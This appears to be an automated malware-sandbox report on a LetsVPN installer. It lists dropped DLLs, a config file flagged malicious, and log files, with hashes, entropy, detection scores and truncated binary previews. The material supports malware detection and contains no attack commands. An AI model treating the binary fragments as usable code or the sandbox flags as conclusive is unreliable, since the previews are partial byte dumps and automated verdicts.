SSDEEP:	96:liBqrQGGJHowfGli6CkuMcuiuwuwu8ux0GReGWeGFuGgeKCUDuTeHOTu0U5e3eT4:liBqrUOpPUDRTHffIC
MD5:	3B1D12693EE14F307D7E8B1F08AE23C0
SHA1:	82719E54B457A4E5CC57B33714E67FC0305B6E90
SHA-256:	0B2A37670105E8D30FE0C4AECFAD876F669663834A6C91BC89E309FB609032B7
SHA-512:	AC7B99E0FB2E7D656DFC8E5DF1FAD58E4446C854E6D1D05A48DBD5FE93AB4978C3B206D828D8BCFC874EFF0981886BE4AE72E063AACCF895959D7CD5456A5E95
Malicious:	true
Preview:	.<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <configSections>.. <section name="EnvConfig" type="System.Configuration.NameValueSectionHandler" />.. <section name="Production" type="System.Configuration.DictionarySectionHandler" />.. <section name="Stage" type="System.Configuration.DictionarySectionHandler" />.. </configSections>.. <startup>.. <supportedRuntime version="v4.0" sku=".NETFramework,Version=v4.6.2" />.. </startup>.. <EnvConfig>.. <add key="env" value="Production" />.. <add key="adCampaign" value="" />.. </EnvConfig>.. <Production></Production>.. <Stage></Stage>.. <runtime>.. <assemblyBinding xmlns="urn:schemas-microsoft-com:asm.v1">.. <dependentAssembly>.. <assemblyIdentity name="SQLitePCLRaw.core" publicKeyToken="1488e028ca7ab535" culture="neutral" />.. <bindingRedirect oldVersion="0.0.0.0-2.0.3.851" newVersion="2.0.3.851" />.. </dependentAssembly>.. <dependentAssembly>.. <assemblyIdentity name

C:\Program Files (x86)\letsvpn\app-3.7.0\LetsVPNDomainModel.dll

Download File

Process:	C:\ProgramData\letsvpn-latest.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	23016
Entropy (8bit):	6.441130187116346
Encrypted:	false
SSDEEP:	384:28KmV2K7tmrZoecNmX3pwKANynsAw/98E9VF3AM+opv28/LYe:R2KZsuV4WAw/KENAMxpRP
MD5:	71D1A40FFC5DF867F6BDE5C151979AC6
SHA1:	3393DD38F6EE1E5AC3BCEBE1C1D62D7915EAF66C
SHA-256:	386BC014245093353DD4DCE5E0E2CEDCCFCEDED9A755EF7A5E1ED22CDC7060A0
SHA-512:	BEF1A6FB75E50354FAB91F8D659D2D017323068DA2D39ED241157B45D8C60C0AD359D1F3D30A509420F3F3C08FB39C1E4FF895DDEC1884223C38A8C52DE8056F
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................." ..0..&...........D... ...`....... ...............................X....`.................................OD..O....`...................+...........C..8............................................ ............... ..H............text....$... ...&.................. ..`.rsrc........`.......(..............@..@.reloc...............,..............@..B.................D......H.......P#..p ..........................................................2r...p.(......(......(....6r%..p..(....6ru..p..(....2r...p.(....6r...p..(....6rg..p..(....2r...p.(....2r...p.(....:r...p...(.....rs..p......%...%...%...%...%....(......(....6r...p..(....2rn..p.(....2r...p.(....2r...p.(....2r...p.(.....rz..p......%...%...%...%...%....%....(....2r...p.(......(....2r...p.(....6r...p..(....:rI..p...(....2r...p.(....2r...p.(....6r...p..(....*6ro..p..(

C:\Program Files (x86)\letsvpn\app-3.7.0\LetsVPNInfraStructure.dll

Download File

Process:	C:\ProgramData\letsvpn-latest.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	24552
Entropy (8bit):	6.5881688344599585
Encrypted:	false
SSDEEP:	384:/alg1rUI/8TocEccc2oS53g4YAb6Q+ReJRpwKANynsAw/98E9VF3AM+oLM8B:NUI/8ccEcccZhRAujeaAw/KENAMxwY
MD5:	3751142369266F95134C079B540BCA53
SHA1:	C2AE53C26D860CD757E1DADBD49DCE4EED728B30
SHA-256:	605BC407A2E8453133A7386B6C11C656F3D5BA59F973849C9AEB3CDD084DAE51
SHA-512:	372DA867FA162D4385316C4D61D33F30AB0C812AA8EC087630FEE4FAB94BE5ECF05C4D8A7F9B8D967FA966F1C590A3F2EDA880758576CCF80010581274184D3D
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................." ..0..,..........2K... ...`....... ....................................`..................................J..O....`...............4...+..........HJ..8............................................ ............... ..H............text...8+... ...,.................. ..`.rsrc........`......................@..@.reloc...............2..............@..B.................K......H........$..`%..........................................................2.(-...(....6.(-....(......(....6.(.....(,...6.(.....(,.....(....6.(.....(,...6.(.....(,.....(......(....b.(-....(-...(.....(,...v.r...p.(....(.....(-...(....2(.....(,...2.(-...(.....0.........................................................(-...~....(...+~....(...+~....(...+~....(...+~....(...+~....(...+~....(...+(.....("....($...2.(-...(&...2.(-...((...J.(-....(-...(...*..0..A.......

C:\Program Files (x86)\letsvpn\app-3.7.0\Log\20240720.log

Download File

Process:	C:\Program Files (x86)\letsvpn\app-3.7.0\LetsPRO.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	229
Entropy (8bit):	5.1612142360837066
Encrypted:	false
SSDEEP:	6:ijgexv/tLHRfrOz+mAJXm1n9qdW8VRxDLM03fYn:ijjXR21sXpUULH3wn
MD5:	5A947139C268452F12829379749A51A7
SHA1:	41068A282AD3643EE1962C66F38718F89E7CF0E0
SHA-256:	F8E9923EF5F096D356E411E531E4DCA6B8E6CAE59095B6A220907BE874167191
SHA-512:	9823C504B39820B9C260C39D4252B3981A104C818F004BE9F07F9BF90D17BB63BD00A727E6C3E602F772FC3D1B0F59062F331F479328DA5BCCE377924F1E04FD
Malicious:	false
Preview:	2024-07-20 10:30:40,948 [Level: ERROR] [Thread: 17] [class:logger] [(null)]: SC-PusherHelper _pusher_Error ..PusherClient.PusherException: App key 4fc436ef36f4026102d7 not in this cluster. Did you forget to specify the cluster?..

C:\Program Files (x86)\letsvpn\app-3.7.0\Log\Lets.log

Download File

Process:	C:\Program Files (x86)\letsvpn\app-3.7.0\LetsPRO.exe
File Type:	ASCII text, with very long lines (13680)
Category:	dropped
Size (bytes):	111060
Entropy (8bit):	6.012885584618952
Encrypted:	false
SSDEEP:	3072:NeeVth95ddBnFwVINFDxWL2PuXww8g9chawWQXdPK:jxBneVIrDUcw2h8WPK
MD5:	09A021058CEFABFF680B48CC29C4D9EA
SHA1:	B2BDF7BC003ABD27637497D006A8C74624254B88
SHA-256:	7D1C695F44E4EF62082F4F304EFF3A12173738C9A8EFCAFA3E3460333BECFE6A
SHA-512:	5006E50E4DF52FA6F6D93A5C281F7FA9A8EB2362740CF467AAB52EB7AA5EF115EA46F8A211242AF4F1592853B47FDFAAB2A18DDD2E06090215F963D4C326A78A
Malicious:	false
Preview:	TUhp7MNjt0usZD6a7B1E/ZwuJZVUoibzclvpWsnNEOc5QCZ1LbvurSvm+sqCeonTvA56anU5.TUhp7MNjt0usZD6a7B1E/ZwuJZVUoibzclvpWsnNEOc5QCZ1LbzvpSvW6tSdM5bcgUbXth94nDqXNp6N1ywcX68ZQ6KhZk0=.TUhp7MNjt0usZD6a7B1E/ZwuJZVbqiPzclvpWsnNEOe9zh1oDcwp76GjhnD1W9Aimb1wAZwTK1LwH8+Rlg==.TUhp7MNjt0usZD6a7B1E/ZwuJZVbqiPzclvpWsnNEOe9zh1oDcQK1O2vnmH8dcwiOLcr0AuqNJ1zLM8yd2JeDXsU3Yv+NojXZALP5om8AO/JXUOJhwyetmZ8IbwfvyMrKub/U925KbIqNF7SCrAEhSMwDyIM2c8yr3n2tpxhyR+sPiJwKTIOI1WMJAFMt7To/dP2ss+2IYucu1cnUY7lI8MKrG29mKqLBjOXAhbuUFMouR+KxsSXYPfJzXxndawfthEq9W5sE3+QzBDH5EzMwsng6uaND/CHtAcJa0pkBVbhW81Pkd5XavZsn+CGSJMU/q6Hb6tlF67UY8adh0ghYg8Ie72K/a1EKotvJZwZ1/nCx1jjwzwz8p9I8D+/SpMKcMS2/px136ZwXrSS9/a3jaVjcI9HyqZMmMXSiOKsTEH0PmKiEwMhzlbpfvasFPrG16FXKvKU+rKDYnFtUy7WI03cyb5qAIxNDmGeQy66x1vjd9I1FRboTVmKSSskIIYxv7wiMqu06I76t+8kzOOUiAvnwaAnj7L5sgKjAM7garn97GC/nGVq/wcoDiFSkd4UhLwp.TUhp7MNjt0usZD6a7B1E/ZwuJZVbqiPzclvpWsnNEOe9zh1oDcsJyuSknCT1UtQigJXNUcmSYC66Kkf2Ik9TWxrcZg==.TUhp7MNjt0usZD6a7B1E/ZwuJZVaqCjzclvpWsnNEO/ex3q1fQPUBWIBKar3ydH3MiTH2QL

C:\Program Files (x86)\letsvpn\app-3.7.0\MdXaml.dll

Download File

Process:	C:\ProgramData\letsvpn-latest.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	122856
Entropy (8bit):	6.257519931937882
Encrypted:	false
SSDEEP:	1536:Y0OQlavbPZKNK9hhmPZEMn5xGFE45N+cX8fZzd97WWhT5wNSAQr7YTFoVaoOT8TS:Yb5vb/lmhMNGzWWhTdTK5N8jhsv
MD5:	72E7F84648E080CBDD8A194626E88759
SHA1:	DAF9925865D0B4DFF2097F5CADBC8A0E6A715EE9
SHA-256:	BAE1268F438CCCA1EA055810C626DC975A650F919713B9F117F1FAC859218A01
SHA-512:	121AF118BEB639A8877995FD9721E5D620CA91A5C689D106392D00002F8C966040C5414AE16511439EE1997AD6794BFD5FF7A81413709DF3A13507D2C7ADD06A
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....w..........." ..0.............R.... ........... ....................... ......m.....`.....................................O........................+..........4...T............................................ ............... ..H............text...X.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B................3.......H........z..@...........,D...............................................(......0..l.......r...p.s.........( ....o!......s"....+%...n...%....o#.....~............o$....o%...%.-....,..o......,..o...........$.3W..........Ea......f~....-.(....~......o&.....{...."..}......{...."..}......{...."..}......{...."..}......{...."..}......{...."..}......{ ..."..} ...F.~!...('...t....6.~!....((.....{"..."..}".....{#..."..}#.....{$..."..}$.....{%..."..}%...*..{&...

C:\Program Files (x86)\letsvpn\app-3.7.0\Microsoft.AppCenter.Analytics.dll

Download File

Process:	C:\ProgramData\letsvpn-latest.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	24552
Entropy (8bit):	6.6217913580903724
Encrypted:	false
SSDEEP:	384:2H9ooU6Xrcnt9sXZ0WQb+Jx4veT6pmj7tkWUVMWRFpwKANynsAw/98E9VF3AM+o3:2H9oR6XScb7Fj7t60Aw/KENAMx+4/
MD5:	66C75FA4A4A02B410968486529A30E24
SHA1:	8F82372DD4236ABEF9E9D4B0717D31B43730E205
SHA-256:	8EC488C0492AA2356A90F02612A1064833396AE160C9F3A0207A182719B0F4FF
SHA-512:	F5F0CFE51611199FDEEE009D7868CD86F18E10C9DB8BDABF4B85187C44D1FB0F496B7A58D87B54AC763E82720171161DF2D7EB1CB95FE91CDF376B448E91EDEC
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...,.q..........." ..0..,...........J... ...`....... ...................................`.................................UJ..O....`...............4...+..........@I..T............................................ ............... ..H............text....... ...,.................. ..`.rsrc........`......................@..@.reloc...............2..............@..B.................J......H.......`...............................................................0..H.........~....,...~....~..........(......~....%-.&s....%...........,..(..............#<.......0..%.......~..........(...............,..(.........................0..........~..........(....(....o....(...+....,..(.................".......0..0.......~..........(....(.....o.....(...+....,..(...............$.......0..).......~..........(....(......o.......,..(.........................0..C........(..

C:\Program Files (x86)\letsvpn\app-3.7.0\Microsoft.AppCenter.Crashes.dll

Download File

Process:	C:\ProgramData\letsvpn-latest.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	53224
Entropy (8bit):	6.275569224094001
Encrypted:	false
SSDEEP:	768:Rqr8YZ2IPJ1hCmfPzcscksOOWwp/fFCHUHGoH0w8eKYIySh6TeAw/KENAMxet:R3aJBOkAHaUm08eKYIITeAwrxet
MD5:	82060B7900E49417E7ECDCD3540D0B96
SHA1:	B53613F50277687FB109AD264D434D41344FDF85
SHA-256:	E8BD0BD9D47C71A4E53D4509B857FFF651DDE15F233FF6DF1231A429981E97BA
SHA-512:	D99C273C15DBFFCEEAD759493C11BACCFAB2B0AE6B9DDC1E24F57D3E53B90B1763979196FBE0411BDCC51FB17E4FB4B043697E31B3BAB56E17533BA3D7B79F21
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..............." ..0.................. ........... ..............................h.....`.....................................O........................+..............T............................................ ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B.......................H........D...t..........................................................&...(....2.r...p(......0..'.......~.........(....t............(...+...3...0..'.......~.........(....t............(...+...3...0..'.......~.........(....t............(...+...3...0..'.......~.........(....t............(...+...3...0..'.......~.........(....t............(...+...3...0..'.......~.........(....t............(...+...3...(.....(......(.....(.....(.....(.....s....zr.-.rM..pro..p(....*..

C:\Program Files (x86)\letsvpn\app-3.7.0\Microsoft.AppCenter.dll

Download File

Process:	C:\ProgramData\letsvpn-latest.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	143336
Entropy (8bit):	6.0318032972154745
Encrypted:	false
SSDEEP:	3072:5XiDdWM0c7K9ES99d3+uVIQNlHK6Uav1vP8F6IhP:ydWM0cW9EONvHKwvP8FbhP
MD5:	E1A6E9B02C3E399663B04EE1451C5964
SHA1:	FCF6688E0C7A1D64F701917C9822F643293F6FB7
SHA-256:	D7F1E857998B35DB917D1355B3329FE78B456D868C6AABDCF1123C4135948641
SHA-512:	D497E94094D5B5242E4EBEA7922446564075859D4E5D3542DA47D7C0B01CC50DC1BBACC09EC070B9B86F4004ED2CC81C6D0807D59047AD2B5A426ED8A037052D
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....gu..........." ..0.............f.... ... ....... .......................`............`.....................................O.... ..\|................+...@..........T............................................ ............... ..H............text...\|.... ...................... ..`.rsrc...\|.... ......................@..@.reloc.......@......................@..B................H.......H...........PR...........................................................0..H.........~....,...~....~..........(......~....%-.&s....%...........,..(..............#<.......0..%.......~..........(...............,..(.........................(g.....(h.....,..o.......(e...r...p(n....(......0..#.......~..........(.............,..(.......................0..#.......~..........(.............,..(.......................0..........~..........(....(....o....(...+....,..(........

C:\Program Files (x86)\letsvpn\app-3.7.0\Microsoft.Bcl.AsyncInterfaces.dll

Download File

Process:	C:\ProgramData\letsvpn-latest.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	24040
Entropy (8bit):	6.6998442362852
Encrypted:	false
SSDEEP:	384:p/9b512C4dABe070VJI0Ftdalemxxf34wqsWeb/WjLBpwKANynsAw/98E9VF3AM2:p/f1IDjV9UPPpW0Aw/KENAMxmHJ
MD5:	3D8A9CF664C2874A9F6880D5F1F51236
SHA1:	D6B9D9A8A2A69028CA9B3F72026185AAA115FDDD
SHA-256:	9FAA1B1F24E9B4A5C758D92880A33F4DFF31ACF53619829F2E7BB6B7790C6D99
SHA-512:	BA83C0528D87F169E76348241F9B55A24DB2F979E545A0F71F1A46F459AB6DB364AE1AFE731DB001615E48F372BFC9A8BFDA19BF00C25F935CD8A718F38DCDC0
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....Q..........." ..0..&...........E... ...`....... ....................................`.................................[E..O....`...............2...+..........hD..T............................................ ............... ..H............text....%... ...&.................. ..`.rsrc........`.......(..............@..@.reloc...............0..............@..B.................E......H.......4&.......................C........................................(......(.....0....................(....}.....6.\|.....(...+:.\|......(...+:.\|......(...+2.\|....(......{....%-.&.\|....s.....(....%-.&.{...."..(....>..}......}......0...........{....o........{....(....Z..}......}......}....N.{......{....s ...N.{.....{.....s ...v.{.....{....o!....{....s".....(...."..s.....0.....................s#...&...s#.....{$..."..}$...*.0..F.........{%....Xh}%.....}&.

C:\Program Files (x86)\letsvpn\app-3.7.0\Microsoft.Expression.Interactions.dll

Download File

Process:	C:\ProgramData\letsvpn-latest.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	102888
Entropy (8bit):	6.1353570583456385
Encrypted:	false
SSDEEP:	1536:Arf5GttgxHXEuRmG5rtkGY4CEmWAxXSSYhhS98ca2Wvsd65FJDlGWwkEyKAwrxSb:05GttWHXEUx5r65LxXshk8JDIWPKhQb
MD5:	26143B75BA521764BF8EB97540DC1834
SHA1:	72E72353C19630720D8DC7BD33960F79F972E110
SHA-256:	D9580C8F08D51207AAD292C459DF017976A6E9CFC7EFE9EBDC3EE97B3C528C74
SHA-512:	044FBB7E12102D3348C295E325AC5289974FFFF155934BB990E158B1352E3D9760AFB35A3BCE6AA0A8415DAB160D958AEF3588DD5021DC33D495E34623062F29
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...eu.K...........!.....\...........z... ........@.. ..............................v.....@..................................y..K....................f...+...........x............................................... ............... ..H............text...$Z... ...\.................. ..`.rsrc................^..............@..@.reloc...............d..............@..B.................z......H...........L...........x...1...P ........................................z...y.k.....bdd I..`..).PsR@... .aL...%:...y.....XDgM.X}..~)2.v-..4..........EAZZ...,..[..H...o5C.o...5/I.m.!2...#.:.(......}....:.(......}.......0..)........{.........(....t......\|......(...+...3.....0..)........{.........(....t......\|......(...+...3."..(...."..(........{....,..{.....o.....{....o....2.~....(....6.~.....(....F.~....(....td...6.~.....(....J.(.....s ...}....*F.(...

C:\Program Files (x86)\letsvpn\app-3.7.0\Microsoft.Web.WebView2.Core.dll

Download File

Process:	C:\ProgramData\letsvpn-latest.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	145896
Entropy (8bit):	5.796559165483351
Encrypted:	false
SSDEEP:	3072:PSiitDW10Oug94BeCCepM1STU/xnW+W6jfM0amyw0VzGLC1grekKtk0do/9o8afw:qiNang9meCCepM1ST+xnW+W6jfM0amyM
MD5:	4FE29372BE1C3B98B5A129F4FFAF75D4
SHA1:	E8DD2E3D96C26E6D4DDD532AF0AA9974248CFAC5
SHA-256:	E6DF6C0ACF073FBBF14F315A9572B029325DF5C27692A34EAB169AA0680F47C7
SHA-512:	E948225AA03843339EA13FB801C819F3AA8DD171F944A54F7E32BA109E5E9F994CCE1B282C91A35356428B2446D267512A3665AC51395C15E30D36355E6686F9
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...vJ.`.........." ..0..............$... ...@....... ...............................n....@..................................$..O....@...................+...`......T#............................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................$......H........q......................".......................................0..H.........(....o.........,....+..{.........,....(....o....s`...}......{.....+...0..a.........(.........,R..(....o......uQ........, .sd.....uQ........{....o6.....+...r...ps........og..........0..>.........{.........,%....{....ti...}.........ru..p.s)...z..{.....+.............$......&...}....z..}.....(.......}.....(.....>.(....o.......R.(.....-..+..o........0............(....o....(.....+..*R..(..

C:\Program Files (x86)\letsvpn\app-3.7.0\Microsoft.Web.WebView2.WinForms.dll

Download File

Process:	C:\ProgramData\letsvpn-latest.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	31208
Entropy (8bit):	6.533726828569594
Encrypted:	false
SSDEEP:	768:NLNoCdzhFQj/hJTBbGXZDDcULH4JVrwRSgBucQgJa5/Zi/dUDyqz1POMr1Aw/KEa:NLqCHmTxGXZDDcULH4JVrwRSgBuvgJau
MD5:	E2AE30A3F257602FC3F1C43CCD2031F4
SHA1:	58F2B71D1162AE9FCDDF429EB278B0E9A98ADF86
SHA-256:	2113EE12B5FA9BAA3E11F199E9F32F77ADA99C2C4526FC7F3B78A48986DC34AA
SHA-512:	0147CE1E1AB792862D2A6C13E81EA72BDDDFEA23A4AF65361FC8EE3C1D98C9003079396D06A542CC77A7AB95BC1CEA15824BA7237AEEE5B57E740943C87C0A7B
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...dCd..........." ..0..D...........b... ........... ....................................`..................................b..O....................N...+...........a..8............................................ ............... ..H............text....B... ...D.................. ..`.rsrc................F..............@..@.reloc...............L..............@..B.................b......H........0..h0..................Da........................................(......{....>..}......}......{....>..}......}......{....>..}......}......{....-%..(.....(......(......s....(....}.....{....r.#.......?}.....(.....(I.....,..(....,..(....,..(.....{....,..{....o......(.....0..................s....(............s....(.....(.......?...s ...o!....(.......>...s"...o#....(.......A...s$...o%....(.......@...s&...o'....(.......B...s(...o)....{.......C...s...o+....{....

C:\Program Files (x86)\letsvpn\app-3.7.0\Microsoft.Web.WebView2.Wpf.dll

Download File

Process:	C:\ProgramData\letsvpn-latest.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	33768
Entropy (8bit):	6.526077258248235
Encrypted:	false
SSDEEP:	768:CnD8wecsVygSvqa8ZDPLryER0SO4JVrTYIWUpDkS/Ka5/Bi/W7v4F4zfKwSAw/Kt:C7eN4vqa8ZDPLryER0SO4JVrTYIWUpDH
MD5:	C128F964B9B57928E3C88ADDAD3BCD98
SHA1:	EEDCA6F35B7B013A9B40C80F7ED9A12E4A6C3F79
SHA-256:	E89D9139DBFF8377D47B6DA01C5A538368B03CBD99329BDE590C6287A28DEBCD
SHA-512:	C43EED9D4F062575E3EF34F35A1015F1E70E3A7D2CAD16DCB65991808282E8FBBB261796363BC8D569D52ACEEBF5109C0B18335065F3D9DBAEE4DD5039E1A831
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...]............" ..0..P...........n... ........... ...............................Z....`.................................Gn..O....................X...+..........xm..8............................................ ............... ..H............text....N... ...P.................. ..`.rsrc................R..............@..@.reloc...............V..............@..B................{n......H........5...7...................l........................................(....F.~....(....t:...6.~.....(....F.~....(....t:...6.~.....(....F.~....(....t:...6.~.....(....6.t.....}......{....-%..(.....(......(......s....(....}.....{......0..........r...p.:...(.........(............s....s....(.........r1..p.:...(.........(............s....s....(.........rO..p.:...(.........(............s....s....(.........J.s....}.....(....F.~....(....t....6.~.....(....*V.t....o....,

C:\Program Files (x86)\letsvpn\app-3.7.0\Microsoft.Win32.Primitives.dll

Download File

Process:	C:\ProgramData\letsvpn-latest.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	16360
Entropy (8bit):	6.900740061079095
Encrypted:	false
SSDEEP:	384:xN9VWhX3WZlpwKANynsAw/98E9VF3AM+oj3S4L:TGnAw/KENAMxl
MD5:	6AE6A4F8D789276D6314D708DC8BCAFC
SHA1:	2AE5D07B8F70B60FCD55FFC77D3B8EDA7F8264E6
SHA-256:	996958AAD17A7834CBC2AAD9F1B8512298F00ADAE044127B1D6ADA086C677C1D
SHA-512:	6983095B266FAEFAE7F99A0C4AD6E49011E70D57D69AB1F9970D5E0E5FB54BF7E668E365418DC351BE976D21083FEA26C6AA4DAD89925DF49F9834DC54810363
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...?..Y.........." ..0..............(... ...@....... ..............................`.....@.................................T(..O....@..0................+...`.......'............................................... ............... ..H............text........ ...................... ..`.rsrc...0....@......................@..@.reloc.......`......................@..B.................(......H.......P ..L....................&......................................BSJB............v4.0.30319......l...\|...#~......<...#Strings....$.......#US.(.......#GUID...8.......#Blob......................3......................................................\.....0...........D.................C.................[.....x.....-.........................................).....1.....9.....A.....I.....Q.....Y.....a.....i.....q.........................#.....+.....3.....;.....C.7...K.W...S.

C:\Program Files (x86)\letsvpn\app-3.7.0\Microsoft.Win32.Registry.AccessControl.dll

Download File

Process:	C:\ProgramData\letsvpn-latest.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	21992
Entropy (8bit):	6.72214788103536
Encrypted:	false
SSDEEP:	384:pSk7xWUHIx0S3WF7rWT6pwKANynsAw/98E9VF3AM+oMy8VE0:p/0UHU0SOCAw/KENAMxij
MD5:	A025379B6C75C72D0B2E44389E1B952E
SHA1:	D73E236D873F78D130A8BFF84D81F9651818D3C9
SHA-256:	399A4963849D90B614A53DD32138B7E5356711766A7DAD2D2563F1BF21D04533
SHA-512:	43B1C7A184049D562B33905802A8076160B6128DC236E0D9E92B3958100E22771DCB698D1554A6582BE40D6A1CB2E3DA8E7D47FA01A3CEFE433D781BF495826D
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...9.2..........." ..0..............=... ...@....... ....................................`..................................<..O....@..................+...`.......;..T............................................ ............... ..H............text........ ...................... ..`.rsrc........@....... ..............@..@.reloc.......`.......(..............@..B.................<......H....... "...............8..(... ;........................................(....^.(...........%...}....:.(......}....:.(......}....:.(......}....:.(......}......{...."..(...."..(...."..(...."..(...."..(......(......(......(......(....:.(......}......{....:.(......}......{....:.(......}......{......(....:.(......}......{....^.(...........%...}....:.(......}......{....z.(......}...........%...}....V.(......}......}......{......{....*V.-.r...ps....z

C:\Program Files (x86)\letsvpn\app-3.7.0\Microsoft.Win32.Registry.dll

Download File

Process:	C:\ProgramData\letsvpn-latest.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	28648
Entropy (8bit):	6.429096413867927
Encrypted:	false
SSDEEP:	384:H4nLpSumfSQrlHViaCZYvLPQmlJLfjnWn6GWYnapwKANynsAw/98E9VF3AM+oPJh:H4QVrxViR9mlxdQAw/KENAMx5Z
MD5:	E108E97E32B706D301DF5A37425D03C4
SHA1:	9389C212DDDC18895E64B4F220FD7A86580FA8D0
SHA-256:	F39A30101A7913E4BAC2A02FF46DF2430C36A5AA5056AB6BBF9EEEACA08642DD
SHA-512:	CDA4A950F1BF4443837245EDC837446A775FA9D904EA4D3E0F08EBC9F21D46F1FFBECF6033459F9FF59996F5A326A0169142FC1D134B6250F26E513420ED310C
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....j............" ..0..:..........jX... ...`....... ....................................`..................................X..O....`...............D...+..........$W..T............................................ ............... ..H............text...p8... ...:.................. ..`.rsrc........`.......<..............@..@.reloc...............B..............@..B................LX......H........$..8"...........G.......V.......................................~......0..1.......(....,..%-.&...(.....o.......&...,...o....,.......................(....,.r...p......%...%...(......(.....(....,.r...p......%...%...%...(.......(.....(....,!r...p......%...%...%...%...(........(......,&(....,..r...pr...p.(....(......(......(....,.r...p......%...%...(.......(.....(....,.r...p......%...%...%...(........(.....(....,"r...p......%...%...%...%....(..........(

C:\Program Files (x86)\letsvpn\app-3.7.0\Microsoft.Win32.SystemEvents.dll

Download File

Process:	C:\ProgramData\letsvpn-latest.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	24552
Entropy (8bit):	6.628605811172365
Encrypted:	false
SSDEEP:	384:SdIaf4rbDyIb/KcWCNRWr7JWUUpwKANynsAw/98E9VF3AM+oCOF193:S+THDHbs6GxAw/KENAMxZ
MD5:	C178E4F20A22104A87D1D301BEC6BCF0
SHA1:	DFAE98F4FBADFA9FC30EA13712A41EA0FFCD2D62
SHA-256:	6F295B2B9F08E75C0A867A72A4DA065CF67AB2497FEFE5C508656224D1D9C132
SHA-512:	7329803D5BC9A6C1AE6F5D1FEDDA531574A831DC42660DA86547A8DBD89DC417E5B2FB3DF3AEB820C3AA67C2BD70792E216FFB26D0CF4D25CC3D94E74EA65253
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...8............." ..0.............H... ...`....... ..............................K.....`.................................yH..O....`..d............4...+...........G..T............................................ ............... ..H............text....(... ..................... ..`.rsrc...d....`.......,..............@..@.reloc...............2..............@..B.................H......H........$...............A.......G.......................................~......0..........(....,....(.....o.......&......................0...........(.......(....-..,....(....,.r...p......%...%...(......(.....(....,.r...p......%...%...%...(.......(.....(....,!r...p......%...%...%...%...(........(......,&(....,..r...pr...p.(....(......(......(....,.r...p......%...%...(.......(.....(....,.r...p......%...%...%...(........(.....(....,"r...p......%...%...%...%..

C:\Program Files (x86)\letsvpn\app-3.7.0\Mono.Cecil.Mdb.dll

Download File

Process:	C:\ProgramData\letsvpn-latest.exe
